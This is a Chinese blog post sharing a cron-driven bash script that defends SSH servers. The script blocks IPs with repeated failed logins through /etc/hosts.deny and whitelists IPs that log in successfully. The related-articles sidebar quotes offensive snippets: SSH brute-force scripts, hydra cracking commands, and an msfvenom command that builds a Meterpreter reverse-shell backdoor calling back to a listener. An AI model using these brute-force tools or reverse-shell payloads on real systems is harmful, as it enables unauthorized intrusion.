SSH入侵防御脚本,对暴力破解、低频攻击同样有效

已于 2024-01-08 15:10:21 修改
阅读量1k 收藏 12
点赞数 21
分类专栏: Linux shell 文章标签: ssh 网络 运维
于 2023-12-13 17:18:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45768191/article/details/134975162
版权
Linux 同时被 2 个专栏收录
16 篇文章 0 订阅
订阅专栏
shell
5 篇文章 0 订阅
订阅专栏

1. 适用场景

服务器因业务需要开放互联网ssh访问时,不能通过限制ip来进行防护,那我们常用的其他安全手段手段包括使用强密码、限制登录频率、使用防火墙、限制访问权限、使用第三方安全服务、使用安全协议(如sftp)等等。通常这些手段对于高频率爆破攻击行为有较好的拦截效果。但攻击者可能会使用低频率、轮换IP的方式来进行攻击、比如一个IP1个小时左右攻击一次,那我们的常规的安全手段很难把这样的行为认定为恶意攻击。
我在工作中也遇到这样的问题,我除了使用基线、防火墙等常规的防护手段之外,使用了shell脚本进行安全防护,脚本是我自己所写,已经运行了半年多,安全可靠。

2. 脚本逻辑

  • 脚本会自动检查服务器系统版本:目前仅支持Centos7和Tencent2.4,其他系统暂不支持。
  • 创建初始白名单:登录成功的IP自动创建为初始白名单,仅首次运行脚本时执行一次,日常防护时,会自动跳过。
  • 判定友方IP:在黑名单规则内(5次内成功登录)仍能登录成功的IP判定为友方IP。
  • 追加白名单:把友方IP自动追加为白名单。
  • 检查黑名单:黑名单数量大于5000条时,清除已添加的黑名单。
  • 判定攻击行为:非友方IP当天登录失败累计超过5次判定其存在攻击行为。
  • 追加黑名单:把存在攻击行为的非友方IP自动追加为黑名单。
  • 记录加黑白名单信息:追加黑白名单后,记录追加的时间与数量。

3. 说明

  • 执行频率:把脚本加入定时任务中,每5分钟执行一次。

  • 黑白名单规则优先级:在同一个执行周期内,若同时触发黑白名单规则,则白名单规则优先于黑名单规则。这样可以避免友方IP因输入错密码导致被拉黑。

  • 手动添加/移除白名单:直接在/home/Accepted_user添加/删除相应IP即可。

  • 手动添加/移除黑名单:直接在/etc/hosts.deny添加/删除相应IP即可(lastb命令根据用户名查IP)。

  • 黑名单周期:黑名单从0增至5000为一个黑名单周期。自动清楚黑名单,避免黑名单过多导致访问变慢。

  • 预期目标:一个黑名单周期内,恶意IP最长攻击时间控制在5分钟内或最大攻击次数限定5次内,降低SFTP服务器被攻破风险。

  • -脚本文件/home/SSHSecurityScript.sh

  • 白名单文件/home/Accepted_user,白名单样例:

    192.168.0.1
192.168.0.2
#sshd Wed Feb 22 14:25:01 CST 2023 新增 2 个白名单

  • 黑名单文件/etc/hosts.deny,黑名单样例:

    sshd:106.75.71.3
sshd:222.105.112.149
#sshd Wed Feb 22 13:55:01 CST 2023 新增 63 个黑名单
sshd:111.173.89.33
sshd:146.190.237.252
#sshd Wed Feb 22 14:10:01 CST 2023 新增 2 个黑名单
sshd:59.125.53.140
#sshd Wed Feb 22 14:15:01 CST 2023 新增 1 个黑名单

  • 黑名单IP登录日志样例:

    Feb 21 14:05:54 ip-10-85-2-105 sshd[9244]: refused connect from 85.152.57.60 (85.152.57.60)

4. 脚本

#! /bin/bash
#version:v1
#author:LJZe
#date:2023-2-20
#crontab -e
#5/* * * * * sh /home/SSHSecurityScript.sh
#systemctl restart crond.service    

#检查系统版本
function CheckSystem() {
    system_version=''
	source /etc/os-release 
    if [[ -e /etc/os-release ]]; then
        system_version=${system_version}"PRETTY_NAME: $PRETTY_NAME, "
	else
		system_version=${system_version}"PRETTY_NAME: `cat /etc/issue|head -n 1`, "
    fi
	system_v=`echo $system_version | awk '{print $2,$3,$4}'`
	system_v1=`echo "$system_v"|awk '{gsub(/ /,"")}1'`
 #   echo "${system_v1}"
}

#创建初始白名单:统计半年内成功登录的IP,耗时久,仅执行一次
function AcceptedUser(){
	date1=`date`
	touch /home/Accepted_user
	grep "Accepted" /var/log/secure*|perl -e 'while($_=<>){ /from(.*?) port/; print "$1\n";}'|sort -nr|uniq -c |sort -nr |awk '{print $2}' > /home/Accepted_user
	echo "#sshd ${date1} 创建初始白名单" >> /home/Accepted_user
}

#新增白名单,在黑名单规则内仍能成功登录的IP,判定为白名单
function AcceptedUserNew(){
	date1=`date`
	Accepted_user_new=$(grep "Accepted password for" /var/log/secure|awk '{print $11}'|sort | uniq -c | sort -nr|awk '{print $2}')
	i=0
	for IP in $Accepted_user_new; do
		Accepted_ip=`grep "$IP" /home/Accepted_user | wc -l`
		if [ $Accepted_ip -le 0 ] ; then
			echo "$IP" >> /home/Accepted_user	
			i=$(( $i + 1 ))
		fi
	done
		#加白名单时间
	if [ $i -gt 0 ];then
		echo "#sshd ${date1} 新增 ${i} 个白名单" >> /home/Accepted_user
	fi
}


#当黑名单大于5000条时清空规则
function delete_rule_CentOS(){ 
	delete_rule=`cat /etc/hosts.deny|grep "sshd:"|wc -l`
	if [ $delete_rule -ge 5000 ];then
		sed -i '/sshd/d' /etc/hosts.deny
	fi
}

#加黑名单
function hosts_deny_CentOS() {
	LANG="en_US.UTF-8"
	date1=`date`
	day1=`date |awk '{print $3}'`
	#日期格式
	if [ ${day1} -lt 10 ];then
		time1=`date|awk '{print $2,"",$3}'`
	else
		time1=`date|awk '{print $2,$3}'`
	fi
	
	#登录失败次数大于5次的IP
	#ABNORMAL_IP=$(lastb |grep "${time1}" |awk '{a[$3]++}END{for(i in a)if(a[i]>5)print i}')
	ABNORMAL_IP=$(grep "Failed" /var/log/secure|grep "${time1}"|awk '{a[$((NF-3))]++}END{for(i in a)if(a[i]>5)print i}')
	#加黑名单
	i=0
	for IP in $ABNORMAL_IP; do
		#验证黑名单是否已存在
		insert_ip=`grep "$IP" /etc/hosts.deny | wc -l`
		#过滤白名单
		insert_ip1=`grep "$IP" /home/Accepted_user | wc -l`
		if [ $insert_ip -le 0 ] ; then
#			echo "屏蔽IP:$IP"
			if [ $insert_ip1 -le 0 ];then
				echo "sshd:${IP}" >> /etc/hosts.deny
				i=$(( $i + 1 ))
#			else 
#				echo "IP:$IP 可能为友方IP,不加入黑名单"
			fi
#		else
#			echo "IP:$IP 已存在系统黑名单中"
		fi
	done

	#加黑名单时间
	if [ $i -gt 0 ];then
		echo "#sshd ${date1} 新增 ${i} 个黑名单" >> /etc/hosts.deny
	fi
}


main() {
	CheckSystem
	if [ $system_v1 = "CentOSLinux7" -o $system_v1 = "TencentOSServer2.4" ];then
		#AcceptedUser初始化白名单,耗时长,仅首次执行一次
		if ! [[ -e /home/Accepted_user ]]; then
			AcceptedUser
		fi		
		AcceptedUserNew
		delete_rule_CentOS
		hosts_deny_CentOS
	else
		echo "此系统为${system_v},仅支持CentOS Linux 7、TencentOS Server 2.4!"
    fi
}
main
ssh弱口令爆破脚本
Bu2n的博客
12-19 3025
@ toc import paramiko import argparse import socket import time import sys """ paramiko模块 需要pip install安装 测试环境:python版本3.10 使用方法:python xx.py进行查看帮助手册 """ description = "例如 python ssh弱口令爆破.py 192.168.175.134 -u burnchi -p e:/pass_lis.txt" # 进行ssh连接动作 de
python安全攻防第七章ssh爆破脚本
willow_liang的博客
10-22 637
#-*- coding:utf-8 -*- import optparse import sys import os import threading import paramiko #parasmiko为ssh登录模块 class ThreadWork(threading.Thread): def __init__(self,ip,usernameBlock,passwordBlock,port): threading.Thread.__init__(self)
SSH爆破脚本编写(十三)
路虽远,行将至。事虽难,做必达。
02-21 1255
利用之前所学的paramiko模块来编写ssh爆破脚本,有手就行! 环境:本地kali虚拟机,账户字典u.txt,密码字典p.txt 完整代码 import paramiko if __name__ == '__main__': client = paramiko.SSHClient() client.set_missing_host_key_policy(paramiko.AutoAddPolicy) user = open('./u.txt') use.
防爆力ssh脚本
weixin_34100227的博客
01-05 95
#!/bin/bash cat /var/log/secure|awk '/Failed/{print $(NF-3)}'|sort|uniq -c|awk '{print $2"="$1;}' > /root/satools/black.txt DEFINE="4" for i in `cat /root/satools/black.txt` do ...
Linux防ssh暴力破解shell脚本
qq_28443927的博客
11-19 593
【代码】Linux防ssh暴力破解shell脚本
基于Python与Shell脚本SSH暴力破解防护&mdash;&mdash;hosts.deny文件自动配置源码
最新发布
10-05
该项目是一款利用Python和Shell脚本编写的SSH暴力破解防护工具,包含36个文件,其中Python源码26个,Shell脚本2个,其他类型文件包括文本文件、配置文件和指令文件。该工具通过分析登录日志,自动将尝试通过暴力破解...
解决阿里云服务器ECS遭到攻击方法:GET和攻击类型:SSH暴力破解
林长有的博客
05-06 6941
攻击方法:GET 方法:修改nginx配置 # vim nginx.conf 二 攻击类型:SSH暴力破解 方法:直接设置安全组,修改ssh默认端口,限制ip访问ssh端口(设置白名单),再改防火墙. 注意两个电脑在使用同一WiFi的情况下,连接服务器,所查看到的ip是一样的. 测试是否配置成功:手机开热点,一台电脑连接手机,再去登录,若不可以登录,证明配置成功 安全管控设置白名单 ...
ssh协议密码暴力破解、基于表单的暴力破解暴力破解----验证码绕过(on client)、暴力破解—验证码绕过(on server)
dyx0910的博客
05-12 2712
ssh协议密码暴力破解、基于表单的暴力破解暴力破解----验证码绕过(on client)、暴力破解—验证码绕过(on server)
SSH密码暴力破解
Marsper的博客
11-16 3785
SSH密码暴力破解 海德拉( Hydra ):希腊神话中的九头蛇,是西方的神话生物,在古希暗神话中出现最为频繁。传说它拥有九颗头,其中一颗头要是被斩断,立刻又会生出两颗头来。 hydra 是世界顶级密码暴力密码破解工具,支持几乎所有协议的在线密码破解,功能强大,其密码能否被破解关键取决于破解字典是否足够强大,在网络安全渗透过程中是一款必备的测试工具。 1.1指定用户破解 打开kali虚拟机 输入hydra -h 查看帮助 Examples: hydra -l user -P passlist.txt ftp
ubuntu使用fail2ban防御ssh暴力破解
SitVen
10-27 1859
查看暴力破解IP sudo grep "Failed password for root" /var/log/auth.log | awk '{print $11}' | sort | uniq -c | sort -nr | more 不查不知道一查吓一跳,暴力破解最多的IP达到4千多次 禁止root账号登录 修改/etc/ssh/sshd_config # sudo...
ssh暴力破解主机密码
08-09
ssh暴力破解windows服务器密码,绝对详细的教程,立即可以使用
SSH暴力破解
xigua2540的博客
06-12 2498
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.10.224 lport=4444 -f elf -o shell //后门名称是shell,反弹到192.168.10.224的4444端口。少部分攻击是针对 tomcat、postgres、 hadoop、 mysql、apache、ftpuser、vnc等Linux 服务器上常见应用程序使用的用户名。SSH基于用户名密码的身份验证,容易遭受密码暴力破解攻击
sshd服务及防暴力破解 附赠防暴力破解脚本
yinzhen_boke_0321的博客
10-28 1087
利用yum源安装sshd服务 客户端安装:openssh-clients.x86_64 服务端安装:openssh-server.x86_64 Opensshsshd有区别吗? 两个是不同的概念,软件包名称叫openshh 开机的服务叫sshd [root@server1 ~]# rpm -ql openssh ###查看安装的相关信息 /etc/ssh ###安装的主目录 ...
Python武器库开发-武器库篇之SSH服务暴力破解(五十四)
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
06-14 1076
SSH(Secure Shell)是一种加密的网络协议,用于在不安全的网络上提供安全的远程登录和文件传输功能。SSH可以在客户端和服务器之间建立安全的通信连接,确保通信数据的机密性和完整性。SSH服务的主要功能包括:远程登录:用户可以通过SSH协议在远程主机上执行命令,就像在本地主机上操作一样。文件传输:SSH可以方便地传输文件和目录,支持上传和下载操作。端口转发:SSH可以在远程主机和本地主机之间建立安全的端口转发通道,用于安全访问远程主机上的服务。
SSH暴力破解实战
qq_50854662的博客
05-28 713
一.hydra【海德拉】 海德拉(Hydra):希腊神话中的九头蛇,是西方的神话生物,在古希腊神话中出现最为频繁。传说它拥有九颗头,其中一颗头要是被斩断,立刻又会生出两颗头来。 Hydra是世界顶级密码暴力破解工具,支持几乎所有协议的在线密码破解,功能强大,其密码能否被破解关键取决于破解字典是否足够强大,在网络安全渗透过程中是一款必备的测试工具。 1.指定用户破解: hydea -l user -P passlist.txt ftp://192.168.0.1 hydra -L userlist.tx
简洁的一键SSH脚本
隔壁阿九的博客
03-06 706
这里发一个自己图省事搞的一个批量打通SSH脚本,可能对于好多朋友也是有用的,是expect+python的一个组合实现,原理很简单,使用起来也不复杂,在此还是简单贴出来说说。 noscp.exp #!/usr/bin/expect#noscp.expif {$argc<4} { puts stderr "Usage: $argv0 localfile remotefile user pas
别让你的服务器沦为肉鸡(ssh暴力破解),密钥验证、双向因子登录值得拥有
刘悦的技术博客
08-19 692
如果你购买了阿里云、腾讯云或者华为云等国内云服务上的服务器,默认登录都是以密码的方式,这就给潜在的渗透带来了机会,因为当你的linux服务器暴露在外网当中时,服务器就极有可能会遭到互联网上的扫描软件进行扫描,然后试图连接ssh端口进行暴力破解(穷举扫描),如果你不采取相对应的措施,迟早有一天服务器会被渗透者攻陷。双因子认证,还会结合一个只有你有的硬件设备。结语:网络千万条,安全第一条,无论多么高深的技术,离开了安全性,那么一切都将失去意义,是空谈,空谈误国,实干兴邦,网络安全,造福大家。
攻击方式 ---- SSH暴力破解
yshir
08-13 4281
主要分为两块,第一块是Windows系统下的SSH暴力破解;第二块就是MacOSX系统下的SSH暴力破解 使用hydra进行 1、常用参数介绍 -l 登录名 如:-l root -L 读取登录文件名 如:-L D:\login.txt -p 密码 如:-p 123456 -P 读取密码文件名,如 -P D:\passwords.txt -C 冒号分隔“登录:通行证”格式 -M 要攻击的服务器列...
hydra(九头蛇)暴力破解
weixin_42478365的博客
02-05 2371
暴力破解: hydra(九头蛇) 参数: -R 继续从上一次进度接着破解 -S 大写,采用SSL链接 -s 小写,可通过这个参数指定非默认端口 -l 指定破解的用户,对特定用户破解 -L 指定用户名字典 -p 小写,指定密码破解,少用,一般是采用密码字典 -P 大写,指定密码字典 -e 可选选项,n:空密码试探,s:使用指定用户和密码试探 -C 使用冒号分割格式,例如“登录名:密码”来代替-L/-P参数 -M 指定目标列表文件一行一条 -o 指定结果输出文件 -f 在使用-M参数以后,找到第一对登录名或者密
帮我写一个防ssh暴力破解脚本
02-07
好的,我会用中文给你写一个防止 SSH 暴力破解脚本。 首先,在 Linux 系统中,我们可以使用 fail2ban 来防止 SSH 暴力破解。fail2ban 是一个开源的防火墙软件,它可以监测日志文件并阻止恶意 IP 地址对服务器进行...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

菜鸟白小白

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值